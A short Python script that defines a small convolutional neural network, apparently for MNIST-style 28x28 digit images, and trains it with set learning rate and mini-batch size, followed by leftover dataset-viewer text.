tr_d, va_d, te_d = ml.load_data_wrapper()
cnet = CNN(
[
ConvPoolLayer(
(50,28,28,1),
(5,5,20),
1,
(2,2),
),
ConvPoolLayer(
(50,12,12,20),
(3,3,16),
1,
(2,2),
pool_stride=2,
linear_output=True,
),
ConnectedLayer(
n_in=5*5*16,
n_out=1000,
mini_batch_size=50,
),
SoftmaxOutputLayer(
n_in=1000,
n_out=10,
mini_batch_size=50,
)
]
)
cnet.train(tr_d,learning_rate=0.5,test_data=te_d,validation_data=va_d)
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.